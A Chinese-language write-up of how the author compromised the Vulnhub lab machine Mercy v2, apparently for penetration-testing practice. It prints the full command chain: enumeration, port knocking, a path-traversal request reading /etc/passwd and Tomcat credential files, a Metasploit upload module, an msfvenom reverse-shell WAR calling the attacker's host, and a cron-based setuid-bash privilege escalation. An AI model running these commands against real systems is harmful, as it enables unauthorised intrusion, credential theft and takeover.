Vulnhub:Digitalworld.local (Mercy v2)靶机
kali:192.168.111.111
靶机:192.168.111.130
信息收集
端口扫描
nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.130
使用enum4linux对目标smb服务进行枚举
enum4linux -a 192.168.111.130
目标文件共享的目录
目标存在的用户
8080端口的网站robots.txt提示存在一个文件
访问该文件得到一串base64加密的密文,之后对密文进行解密,解密密文提示存在一个密码:password
echo 'SXQncyBhbm5veWluZywgYnV0IHdlIHJlcGVhdCB0aGlzIG92ZXIgYW5kIG92ZXIgYWdhaW46IGN5YmVyIGh5Z2llbmUgaXMgZXh0cmVtZWx5IGltcG9ydGFudC4gUGxlYXNlIHN0b3Agc2V0dGluZyBzaWxseSBwYXNzd29yZHMgdGhhdCB3aWxsIGdldCBjcmFja2VkIHdpdGggYW55IGRlY2VudCBwYXNzd29yZCBsaXN0LgoKT25jZSwgd2UgZm91bmQgdGhlIHBhc3N3b3JkICJwYXNzd29yZCIsIHF1aXRlIGxpdGVyYWxseSBzdGlja2luZyBvbiBhIHBvc3QtaXQgaW4gZnJvbnQgb2YgYW4gZW1wbG95ZWUncyBkZXNrISBBcyBzaWxseSBhcyBpdCBtYXkgYmUsIHRoZSBlbXBsb3llZSBwbGVhZGVkIGZvciBtZXJjeSB3aGVuIHdlIHRocmVhdGVuZWQgdG8gZmlyZSBoZXIuCgpObyBmbHVmZnkgYnVubmllcyBmb3IgdGhvc2Ugd2hvIHNldCBpbnNlY3VyZSBwYXNzd29yZHMgYW5kIGVuZGFuZ2VyIHRoZSBlbnRlcnByaXNlLg==' | base64 -d
使用用户qiu和密码:password,查看目标文件共享
smbclient -U qiu \\\\192.168.111.130\\qiu
在\.private\opensesame目录下存放有两个文件
查看configprint发现是一个脚本,其中把/etc/knockd.conf配置文件追加到config文件中
使用knock进行端口碰撞开启22和80端口
knock 192.168.111.130 159 27391 4 -v
knock 192.168.111.130 17301 28504 9999 -v
漏洞利用
访问目标80的robots.txt,提示两个目录
其中/nomercy目录下的rips cms存在文件包含漏洞
searchsploit rips
http://192.168.111.130/nomercy/windows/code.php?file=../../../../../../etc/passwd
在8080端口首页存在提示:
注意:出于安全原因,使用管理器 Web 应用程序仅限于角色为“manager-gui”的用户。主机管理器 Web 应用仅限于角色为“admin-gui”的用户。用户在 /etc/tomcat7/tomcat-users.xml 中定义。
文件包含/etc/tomcat7/tomcat-users.xml,在页面底部有用户fluffy和thisisasuperduperlonguser的密码
http://192.168.111.130/nomercy/windows/code.php?file=../../../../../../etc/tomcat7/tomcat-users.xml
使用thisisasuperduperlonguser用户登录8080端口的tomcat后台
拿shell的两种方法
第一种
使用msf模块exploit/multi/http/tomcat_mgr_upload上传反弹shell
use exploit/multi/http/tomcat_mgr_upload
set rhosts 192.168.111.130
set rport 8080
set Httpusername thisisasuperduperlonguser
set httppassword heartbreakisinevitable
run
第二种
使用msfvenom生成war包,上传war包后执行反弹shell
msfvenom -p linux/x86/shell_reverse_tcp lhost=192.168.111.111 lport=5555 -f war > shell1.war
使用7z查看war包内容
7z l shell1.war
上传后会自动生成目录(目录名为war包文件名),反弹shell为使用7z查看的.jsp后缀文件
访问http://192.168.111.130:8080/shell1/sjwdzibqunxeli.jsp获得反弹shell
提权
使用之前在/etc/tomcat7/tomcat-users.xml发现的fluffy用户密码切换到fluffy用户
在fluffy用户家目录下的.private/secrets目录中发现timeclock文件
猜测是计划任务(文件名提示这么明显了),同时该文件有777权限,修改文件内容提权
echo 'cp /bin/bash /tmp/bash;chmod 4777 /tmp/bash' >> timeclock
/tmp/bash -p
Vulnhub:Digitalworld.local (Mercy v2)靶机相关推荐
- vulnhub - digitalworld.local: MERCY v2 (考点:信息搜集 smb 端口敲门 RIPS tomcat linux 提权)
https://www.vulnhub.com/entry/digitalworldlocal-mercy-v2,263/ nat网络 arp-scan -l 比平常多出来的ip就是靶机了 nmap ...
- OSCP练习:vulhub靶机DIGITALWORLD.LOCAL: MERCY v2
nmap扫下端口 nmap -sS -sV 192.168.8.144 发现22.80是关的,应该需要敲门 8080是tomcat页面,但是manager没密码控制台进不去, 提示主机管理器 Web ...
- digitalworld.local: MERCY靶机入侵
0x01 前言 MERCY是一个致力于PWK课程安全的靶机系统.MERCY是一款游戏名称,与易受攻击的靶机名称无关.本次实验是攻击目标靶机获取root权限并读系统目录中的proof.txt信息 靶机的 ...
- Vulnhub:Digitalworld.local (Development)靶机
kali:192.168.111.111 靶机:192.168.111.130 信息收集 端口扫描 nmap -A -v -sV -T5 -p- --script=http-enum 192.168. ...
- vulnhub mercy v2
nmap扫描主机和开放的端口 靶机IP:10.0.2.52 进入8080端口 发现 host-manager需要输入用户名和密码 gobuster扫描 进入robots 进入上述目录 放在解密网站里 ...
- 【VulnHub靶场】——CFS三层靶机内网渗透实操
作者名:白昼安全 主页面链接:主页传送门 创作初心:一切为了她 座右铭:不要让时代的悲哀成为你的悲哀 专研方向:网络安全,数据结构 每日emo:希望是你,最好是你,一定是你 嗨害嗨,我又回来啦,8月份 ...
- 靶机渗透练习56-digitalworld.local:TORMENT
靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-torment,299/ Description This is the evil ...
- 靶机渗透练习53-digitalworld.local:BRAVERY
靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/ Description This machine hope ...
- 靶机渗透练习58-digitalworld.local:VENGEANCE
靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-vengeance,704/ Description 2021 brings us ...
最新文章
- 课程第五天内容《基础交换 五》
- jupyter配置默认启动目录
- php 图像 处理,PHP 处理图像步骤解析
- linux shell less 命令---转
- JSPatch Convertor 实现原理详解
- 【深度学习系列】基础知识、模型学习
- 【转载】浅谈 看图软件 的设计与实现
- python机器学习彩票_Python机器学习及实战kaggle从零到竞赛PDF电子版分享
- 2022.7台式机装机指南(3060 + 12490F)
- Office在线预览-永中
- c语言四则混合运算可以带括号,带小括号的四则混合运算听后感
- Salesforce随笔: 解决被指定给Chatter相关用户的RecordType无法被删除的问题
- 【BZOJ】3168: [Heoi2013]钙铁锌硒维生素
- Logo Grabber 一键快速下载网站Logo 的免费插件
- 【PHP】php 递归、效率和分析
- 毛玻璃matlab,QA清单(毛玻璃赛题)
- 安全多方计算之BGW算法
- 神经网络ppt不足之处怎么写,神经网络ppt免费下载
- 手撕自动驾驶算法——IMU测量模型、运动模型、误差模型
- 利用vbs将word、excel、ppt转换成pdf